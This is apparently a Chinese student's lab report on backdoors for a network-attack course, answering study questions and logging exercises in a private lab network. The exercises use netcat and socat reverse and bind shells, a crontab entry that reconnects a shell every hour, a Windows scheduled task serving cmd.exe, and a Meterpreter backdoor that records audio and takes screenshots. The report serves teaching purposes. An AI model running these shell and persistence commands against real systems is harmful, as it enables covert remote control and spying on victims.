20145333《网络对抗》Exp2 后门原理与实践
20145333《网络对抗》Exp2 后门原理与实践
1.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
通过邮件发送,邮箱里经常受到一些陌生人发来的链接。
误入了一些不安全的网站。
网上下载软件时被一起打包下载了。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;
Linux下可以通过cron来启动。
(3)Meterpreter有哪些给你映像深刻的功能?
- 可以截取被控端的屏幕、获取被控端的键盘录入,从而了解被控端的很多重要信息。
(4)如何发现自己有系统有没有被安装后门?
- 现在的防火墙和杀毒软件还是很厉害的,一般都可以查出来
2.实验总结与体会
- 实验过程中通过后门非常轻易的就从被控端上获取了很多信息,感觉原来我们的电脑真的非常脆弱,没我们想的那么牢靠,以后一定要提高安全意识,经常杀毒,打补丁,否则真的会泄露我们很多重要的信息。
3.实践过程记录
使用netcat使Windows获得Linux Shell
- 在Windows下,先使用
ipconfig
指令查看本机IP:
使用
ncat.exe
程序监听本机的5333端口ncat.exe -l -p 5333
在Kali环境下,使用
nc
指令的-e
选项反向连接Windows主机的5333端口:
- Windows下成功获得了一个Kali的shell,运行
ls
指令如下:
使用netcat使Linux获得Windows Shell
- 在Kali环境下用
ifconfig
查看IP:
使用
nc
指令监听5333端口:
nc -l -p 5333
在Windows下,使用
ncat.exe
程序的-e
选项项反向连接Kali主机的5333端口:
- Kali下可以看到Windows的命令提示,可以输入Windows命令:
使用netcat获取主机操作Shell,cron启动
- 在linux中使用
crontab
指令增加一条定时任务
- 使用
crontab -l
查看刚刚添加的定时任务 - 在最后一行添加20 * * * * /bin/netcat 192.168.1.103 5333 -e /bin/sh,意思是在每个小时的第20分钟反向连接Windows主机的5333端口
使用socat使Windows获得Linux Shell
- 在linux中,使用socat绑定bash与端口号,监听,等待连接
- win中使用socat对linux进行tcp固定端口连接,成功获取linux shell
设置任务计划启动,使用sotcat获得win shell
- 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
- 在操作中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5333 exec:cmd.exe,pty,stderr
创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
在Kali环境下输入指令
socat - tcp:192.168.1.103:5333
,发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
因为换了网,所以IP有所变化,下面是新的IP:
- 生成后门程序:
- 通过nc指令将生成的后门程序传送到Windows主机上:
- 查看win下是否成功接受可执行文件
- 在Kali上使用
msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
- 双击运行windows上的可执行文件,linux成功获取windows shell
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用
record_mic
指令可以截获一段音频:
- 使用
screenshot
指令可以进行截屏:
在获取目标主机的摄像头使用权时出现了问题。。。
尝试提权显示环境不正确
20145333《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- 如何打开或关闭windows的测试模式
百度经验:jingyan.baidu.com windows的测试模式就如同字面意思一样,是一个测试用的模式.这个模式的标志主要在有非官方驱动或系统关键文件运行时显示.例如安装了大内存补丁(32位系统 ...
- JS-cookie封装
智能社学习笔记 <script type="text/javascript"> /*****设置cookie*****/ function setCookie(name ...
- Cookie/Session机制详解 <转>
会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话.常用的会话跟踪技术是Cookie与Session.Cookie通过在客户端记录信息确定用户身份,Session通过在服务器端 ...
- [Bootstrap] install Bootstrap framework in window 7 by npm
Install with npm You can also install Bootstrap using npm: $ npm install bootstrap require('bootstra ...
- 【Android】Scrollview 相关问题汇总
去除Scrollview 滑动边界渐变颜色 去掉滚动条,并将在滑动时,边界不会变成灰白 <horizontalscrollview android:overScrollMode="ne ...
- Python - 3.6 学习四
错误.调试和测试 程序运行中,可能会遇到BUG.用户输入异常数据以及其它环境的异常,这些都需要程序猿进行处理.Python提供了一套内置的异常处理机制,供程序猿使用,同时PDB提供了调试代码的功能,除 ...
- ssh-keygen 不是内部或外部命令解决办法!
在使用 git 的远程仓库的时候,生成秘钥的使用,会遇到ssh-keygen不是内部命令也不是外部命令的问题: 具体解决: 第一步:找到:Git/usr/bin目录下的ssh-keygen.exe(一 ...
- linux漏洞扫描工具【lynis】
Lynis是一款Unix系统的安全审计以及加固工具,能够进行深层次的安全扫描,其目的是检测潜在的时间并对未来的系统加固提供建议.这款软件会扫描一般系统信息,脆弱软件包以及潜在的错误配置. 特征: 漏洞 ...
- 解析导航栏的url
前段时间做ui自动化测试的时候,导航栏菜单始终有点问题,最后只好直接获取到url,然后直接使用driver.get(url)进入页面: 包括做压测的时候,比如我要找出所有报表菜单的url,这样不可能手 ...
- Redis 缓存穿透,缓存击穿,缓存雪崩的解决方案分析
设计一个缓存系统,不得不要考虑的问题就是:缓存穿透.缓存击穿与失效时的雪崩效应. 一.什么样的数据适合缓存? 分析一个数据是否适合缓存,我们要从访问频率.读写比例.数据一致性等要求去分析. 二.什么 ...